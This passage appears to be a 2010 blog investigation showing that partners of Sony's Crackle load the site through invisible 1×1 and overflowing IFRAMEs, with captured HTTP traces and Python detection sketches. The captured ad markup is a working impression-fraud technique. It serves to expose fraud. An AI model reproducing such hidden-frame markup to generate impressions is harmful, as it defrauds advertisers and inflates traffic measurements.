So the problem was substantial, real, and immediate. Facebook errs in suggesting the contrary.
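The point above about default server logs can be made concrete. The sketch below assumes a web server writing the widely used Apache "combined" log format, which records the Referer of every request, and pulls out entries whose Referer carries a ref=profile tag. The log lines, addresses, host names, and ID are invented for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def profile_referers(log_lines):
    """Yield (client address, referer) pairs whose Referer carries ref=profile."""
    for line in log_lines:
        match = COMBINED.match(line.strip())
        if not match:
            continue  # skip lines that are not in combined format
        referer = match.group("referer")
        query = parse_qs(urlsplit(referer).query)
        if "profile" in query.get("ref", []):
            yield match.group("host"), referer

# Hypothetical log entries; the addresses, paths, and ID are invented.
sample_log = [
    '192.0.2.10 - - [20/May/2010:10:00:00 +0000] "GET /landing HTTP/1.1" 200 512 '
    '"http://social.example/profile.php?id=12345&ref=profile" "Mozilla/4.0"',
    '192.0.2.11 - - [20/May/2010:10:00:05 +0000] "GET /landing HTTP/1.1" 200 512 '
    '"http://social.example/home.php" "Mozilla/4.0"',
]

for client, referer in profile_referers(sample_log):
    print(client, referer)
```

Nothing here requires special tooling: the Referer is already in the log, so a short script run months later would find it just as easily.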

Sony’s Crackle: Invisible Traffic Galore

Advertisers buying display ads from Sony’s Crackle.com rightly and reasonably expect that users can see the ads. After all, a visible ad is a basic and crucial condition for effective display advertising: If a user can’t see an ad, then the impression is wasted, as is the associated spending. Nonetheless, in a surprising series of incidents, numerous Crackle partners are loading the Crackle site invisibly, thereby overcharging advertisers for worthless invisible impressions.

Below, I present three recent examples of Crackle partners loading the Crackle site invisibly, largely via 1×1 IFRAMEs. I then tabulate observations preserved by my automation, demonstrating that Crackle’s tainted traffic has continued for more than a year. I conclude by flagging implications for traffic measurement and ad pricing, and by suggesting what Crackle should do to clean up this mess.

Example 1: Yahoo Right Media, Adjuggler Invisible (1×1) IFRAME Loads Crackle Invisibly

In testing of April 24, 2010, my Automatic Spyware Advertising Tester browsed a series of ad URLs I had previously observed to be loaded by various spyware (installed through security exploits without user consent). One such URL embedded Bcserving tags for a 160×600 IFRAME, which passed traffic through Yahoo Right Media (yellow) to Adjuggler (green). Crucially, Adjuggler responded with an invisible 1×1 IFRAME (red) loading a URL on the Crackle site (blue). Meanwhile, another 1×1 IFRAME loaded competing video site Buddytv (grey).

GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=1292398882782181&nc=26008239 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgAcAAoAAAAAAP8AAAAHGBe4GAAAAAA
ANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIAAgAAAAAAXI.C9Shczz
9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJXq7VaJccC
LvQxO2LYSYeejv1pj-PofdqHVgeAAAAAA==,,…,4256ee3e-5018-11df-ace3-001e6837e93f
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_185B9A7222F0F2E13794DA5C=a; ajcmp=2023xkW0101Em0039kn

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sun, 25 Apr 2010 03:11:36 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript

document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC= “http://search.dailygamingupdates.com/ioq1wEIC6YxRSnWiIC9BHpdX0b1i.html”><“+”/IFRAME><“+”br><“+”/br>n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC=”http://crackle.com/c/A_River_Runs_Through_It/?cmpid=762“><“+”/IFRAME><“+”br><“+”/br>n”);
document.write(“n”);
document.write(“<“+”iframe src=”http://www.buddytv.com/home2/american-idol-home2.aspx” width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″><“+”/iframe>”);

The net effect was to load the Crackle site completely invisibly. The page-load also embedded tracking tags for comScore/ScorecardResearch (yellow). Unless comScore takes special steps to recognize and discount these invisible loads of the Crackle site, the presence of these tags would cause comScore services to overstate Crackle’s popularity.

<script type=”text/javascript”>
document.write(unescape(“%3Cscript src='” + (document.location.protocol == “https:” ? “https://sb” : “http://b”) + “.scorecardresearch.com/beacon.js’ %3E%3C/script%3E”));
</script>

<script type=”text/javascript”>
COMSCORE.beacon({
c1: 2,
c2: 6035898,
c3: “”,
c4: “Crackle.com”,
c5: “030224”,
c6: “”,
c15: “”
});
</script>
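As a rough illustration of how invisible IFRAMEs like those in Example 1 could be flagged automatically, the Python sketch below scans markup for IFRAME tags whose declared width and height are both at most 1 pixel. It is an illustrative sketch under that narrow assumption, not the tester's actual code. The class and function names are hypothetical, and the second IFRAME in the sample markup is an invented visible placement for contrast.

```python
from html.parser import HTMLParser

class TinyIframeFinder(HTMLParser):
    """Collect the SRC of every IFRAME whose declared size is at most 1x1."""

    def __init__(self):
        super().__init__()
        self.invisible_sources = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lowercases tag names
            return
        attributes = dict(attrs)     # attribute names are lowercased too
        try:
            width = int(attributes.get("width") or "")
            height = int(attributes.get("height") or "")
        except (TypeError, ValueError):
            return                   # size missing or not a plain integer
        if width <= 1 and height <= 1:
            self.invisible_sources.append(attributes.get("src"))

def find_invisible_iframes(markup: str):
    finder = TinyIframeFinder()
    finder.feed(markup)
    return finder.invisible_sources

markup = (
    '<IFRAME FRAMEBORDER=0 SCROLLING=NO WIDTH=1 HEIGHT=1 '
    'SRC="http://crackle.com/c/A_River_Runs_Through_It/?cmpid=762"></IFRAME>'
    # Invented visible placement, for contrast only.
    '<IFRAME WIDTH=160 HEIGHT=600 SRC="http://ads.example/visible"></IFRAME>'
)
print(find_invisible_iframes(markup))
```

A check on declared size alone would miss frames hidden by other means, such as CSS or placement outside the visible area, so it gives only a lower bound on invisible loads.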

Example 2: Yahoo Right Media, Adjuggler, Media Javelin Overflowing IFRAME (1280×800 inside 160×600) Loads Crackle Invisibly

In testing of April 14, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to an ad on Adjuggler (green) with an HTML comment referencing Media Javelin (pink). The placement was purportedly a 160×600 (grey), yet the response included a further 160×600 ad (completely filling the available space) (grey) followed by three 1280×800 IFRAMEs (red). The third of these IFRAMEs passed traffic to an Adspeed URL (orange) which passed traffic to Crackle (blue).

GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=9001545836619459&nc=92606617 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAEAh e4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIA AgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_…=a; ajcmp=…

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Wed, 14 Apr 2010 05:43:20 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript
Set-Cookie: ajcmp=…;Max-Age=315360000;expires=Sat, 11 Apr 2020 05:43:20 GMT;Path=/

document.write(“<“+”!– BEGIN STANDARD TAG – 160 x 600Mediajavelin.com: Run-of-site – DO NOT MODIFY –>n”);
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC=”http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=1024×800&section=820955“><“+”/IFRAME>n”);
document.write(“<“+”!– END TAG –>n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_home_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82609&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82609&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_idol_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82610&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82610&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Crackle_blood_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82611&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“”);

GET /ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAE Ahe4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAA AAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: g.adspeed.net
Connection: Keep-Alive

HTTP/1.1 200 OK
P3P: policyref=”http://g.adspeed.net/w3c/p3p.xml”, CP=”NOI CUR ADM OUR NOR STA NID”
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Content-type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Wed, 14 Apr 2010 05:43:19 GMT
Server: AdSpeed/s10

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style=”background-color:transparent”><SCRIPT language=”JavaScript”>
<!–
window.location=”http://crackle.com/c/Blood/?cmpid=763“;
//–>
</SCRIPT><div style=”position:absolute;left:0px;top:0px;visibility:hidden;”><img src=”http://g.adspeed.net/ad.php?do=imp&zid=0&aid=82611&auth=0DB7FD0BC9&wd=1280&ht=800&cb=1271223799″ alt=”i” width=”1″ height=”1″ /></div></body></html>

The net effect was to load the Crackle site completely invisibly. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.
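The arithmetic behind the overflow in Example 2 can be sketched briefly. The Python function below assumes that frames stack top to bottom from the slot's top-left corner and that the slot does not scroll, so anything past its edges is clipped. Both are simplifying assumptions about layout, and the function name is hypothetical.

```python
def visible_area(slot_w, slot_h, frames):
    """Return the visible pixel area of each frame inside a clipped slot.

    Assumes frames stack top to bottom from the slot's top-left corner and
    that the slot does not scroll, so anything past its edges is cut off.
    """
    areas = []
    top = 0
    for width, height in frames:
        shown_w = min(width, slot_w)
        shown_h = max(0, min(top + height, slot_h) - top)
        areas.append(shown_w * shown_h)
        top += height
    return areas

# Sizes from the Example 2 response: one 160x600 ad, then three 1280x800 IFRAMEs.
frames = [(160, 600), (1280, 800), (1280, 800), (1280, 800)]
print(visible_area(160, 600, frames))  # [96000, 0, 0, 0]
```

Under these assumptions the first ad consumes the entire 160×600 slot, leaving no visible pixels for any of the three 1280×800 frames that follow.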

Example 3: Yahoo Right Media, Extreme-sportsonline, Hotbizguide Double Invisible (1×1) IFRAMEs Load Crackle Invisibly

In testing of April 13, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to Extreme-sportsonline (green) which included a 1×1 IFRAME (grey) passing traffic to Hotbizguide (pink). Hotbizguide returned two separate 1×1 IFRAMEs (red) loading Crackle (blue).

GET /BhkG9KftZrBezVPLOKuGW5pr4LRA.html HTTP/1.1 …
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJGEgAAAAAAARoEwAAAAAAAgA0AAIAAAAAAP8AAA ADChe4GAAAAAAASncaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYA AAAAAAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHyzysEFgNCMHLNiu.ziQAnw9Ws9ezWVJH53CoAAAAAA==,,…
Host: search.extreme-sportsonline.com …

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 13:37:58 GMT

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html ; }
function trigger() { step++; if(step==max_steps){ load_content(); } }
</script>
<div id=”inifrcode”></div>
<iframe src=”http://search.hotbizguide.com/66682d5b6048f47cf70e56deb9989bb1.php” marginwidth=”0″ marginheight=”0″ hspace=”0″ vspace=”0″ frameborder=”0″ scrolling=”no” width=”1″ height=”1″ onload=”trigger();”></iframe><!–inifrcode–>
<div id=”stuff”></div>
<div id=”stuff1″></div>
<div id=”innercode”></div>
</body>
</html>

GET /MTNkyUL9SGHUGOPKuJJ7uj3AOWuN.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://search.mobilegamesearch.com/NgVbJ4eWaW7bMt57RcZVGMggRW9t.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: search.hotbizguide.com
Connection: Keep-Alive
Cookie: PHPSESSID=a8qbtgec2k79fd8c6onqp5k3q6

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 21:45:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trkid=…; expires=Fri, 16-Apr-2010 21:45:49 GMT

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html >iframe src=”http://crackle.com/c/A_River_Runs_Through_It/?cmpid=728” width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″></iframe>
<iframe src=”http://crackle.com/c/The_Beast/?cmpid=692” width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″></iframe>
<!–customcode–>

The net effect was to load the Crackle site completely invisibly, twice. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.
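Nested chains like the one in Example 3 can be traced mechanically. The Python sketch below follows IFRAME SRC attributes from one captured response to the next and lists the full chain behind each final page load. It assumes the captured markup is available as a mapping from URL to response body. The function name is hypothetical, and the paths a.html and b.php are shortened placeholders rather than the URLs in the trace.

```python
import re

IFRAME_SRC = re.compile(r'<iframe\b[^>]*\bsrc="([^"]+)"', re.IGNORECASE)

def leaf_loads(url, responses, chain=()):
    """Follow nested IFRAMEs and yield the full chain for each final page load.

    responses maps a URL to the markup captured for it; a URL with no captured
    markup is treated as the end of its chain.
    """
    chain = chain + (url,)
    children = IFRAME_SRC.findall(responses.get(url, ""))
    if not children:
        yield chain
        return
    for child in children:
        if child in chain:   # guard against a frame that loads its own ancestor
            continue
        yield from leaf_loads(child, responses, chain)

# Simplified stand-ins for the captured responses; paths are placeholders.
responses = {
    "http://search.extreme-sportsonline.com/a.html":
        '<iframe src="http://search.hotbizguide.com/b.php" width="1" height="1"></iframe>',
    "http://search.hotbizguide.com/b.php":
        '<iframe src="http://crackle.com/c/A_River_Runs_Through_It/?cmpid=728" width="1" height="1"></iframe>'
        '<iframe src="http://crackle.com/c/The_Beast/?cmpid=692" width="1" height="1"></iframe>',
}

for chain in leaf_loads("http://search.extreme-sportsonline.com/a.html", responses):
    print(" -> ".join(chain))
```

Each printed chain ends at a Crackle URL, which makes it plain that a single ad request produced two separate loads of the Crackle site.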

A Long-Term Problem

To confirm the scope of Crackle’s invisible and forced-visit traffic and to evaluate trends over time, I searched logs preserved by my Automatic Spyware Advertising Tester. My tester records the URLs of pages loaded by the spyware-infected virtual computers, but my tester never intentionally visited the Crackle site, nor did my tester ever prompt or provoke traffic to Crackle in any way. So if my tester observes traffic to Crackle, that traffic must have occurred unrequested — invisibly or, at best, through a spyware popup or popunder.

The following table summarizes my tester’s observations of traffic to Crackle:

Period                        Observations of traffic to Crackle.com
Q1 2009                       15
Q2 2009                       57
Q3 2009                       95
Q4 2009                       31
Q1 2010                       51
April 2010 (month to date)    74
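A tally of this kind can be sketched in a few lines of Python. The example below assumes the log is available as (date, URL) pairs and counts entries per quarter whose host is crackle.com or one of its subdomains. The function names and sample rows are hypothetical illustrations, not the tester's actual code or records.

```python
from collections import Counter
from datetime import date
from urllib.parse import urlsplit

def quarter_label(day: date) -> str:
    """Format a date as its calendar quarter, e.g. 'Q2 2010'."""
    return f"Q{(day.month - 1) // 3 + 1} {day.year}"

def tally_by_quarter(observations, domain="crackle.com"):
    """Count logged page loads per quarter whose host is domain or a subdomain."""
    counts = Counter()
    for day, url in observations:
        host = (urlsplit(url).hostname or "").lower()
        if host == domain or host.endswith("." + domain):
            counts[quarter_label(day)] += 1
    return counts

# Hypothetical log rows for illustration; not the tester's actual records.
observations = [
    (date(2010, 4, 13), "http://crackle.com/c/The_Beast/?cmpid=692"),
    (date(2010, 4, 14), "http://www.crackle.com/c/Blood/?cmpid=763"),
    (date(2010, 2, 2), "http://video.example/home"),
    (date(2009, 8, 30), "http://crackle.com/c/Blood/"),
]
print(tally_by_quarter(observations))
```

Matching on the parsed host name, rather than searching for the string "crackle" anywhere in the URL, avoids counting pages that merely mention Crackle in a query parameter.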

Although my testing methods have changed over time (e.g. to test new spyware), my testing intensity has remained constant. I have no specific reason to expect that adjustments to my methods would be more or less effective at uncovering Crackle incidents. I therefore tend to attribute month-to-month changes to changes in the intensity with which Crackle’s partners purchase invisible traffic and other tainted traffic on Crackle’s behalf. In my experience, most traffic-buyers run on-and-off campaigns — buying traffic for a time, then taking a break. If Crackle’s traffic buying followed a similar approach, spikes would be expected.

In any event, invisible and forced-visit traffic to Crackle cannot be written off as a short-term anomaly. Quite the contrary, my tester’s observations confirm that these problems have persisted for many months.

Implications and Next Steps

Advertisers buying placements on Crackle reasonably expect high-quality traffic. For example, the first clause of Crackle’s “About” page boasts that Crackle is owned by Sony, and Sony’s size and wealth provide a level of accountability that smaller video sites cannot offer. Nonetheless, my observations confirm that some placements on Crackle are entirely worthless.

Crackle may blame its tainted and invisible traffic on traffic brokers, affiliates, and other external forces. But traffic-buying inevitably invites exactly these shenanigans. If Crackle intends to buy traffic, it should better vet its partners — including confirming partners’ bona fides, overseeing partners’ specific methods, and developing procedures to hold partners accountable for any shortfalls. I’ve seen no sign of any such efforts. If Crackle can’t buy traffic with the requisite skill, perhaps Crackle would do better by ceasing to buy traffic at all.

Crackle traffic rank from Alexa - April 2010

Three years ago, I posted How Spyware-Driven Forced Visits Inflate Web Site Traffic Counts, pointing out that cheap spyware and popup traffic can increase measurements of web site popularity. Users at least see those spyware popups, giving some nugget of rationale for resulting traffic figures. But users cannot even see the Crackle site when it is loaded invisibly as detailed above. Nonetheless, invisible site-loads are still likely to inflate measurements of Crackle’s traffic. For example, during the first few days of April 2010, my tester observed rampant fake traffic to Crackle, and Alexa simultaneously reported a major spike in Crackle’s traffic. (See image at right.) Furthermore, with comScore tags embedded in each Crackle impression, comScore systems receive a report each time Crackle’s site is loaded. Indeed, such reports come from a large number of distinct IP addresses, seemingly confirming that the traffic is legitimate. Can comScore successfully recognize and discount invisible loads of the Crackle site? If not, comScore will join Alexa in overstating Crackle’s popularity.

My bottom line? Buying traffic is a dirty business — so many sellers who provide worthless traffic, and so many buyers who use too little care in selecting and assessing the traffic they buy. As it stands, advertisers and networks doing business with Crackle risk paying for ads users cannot see. Plenty of small-time video sites play these games, but it’s disappointing to see a Sony site stoop to that level.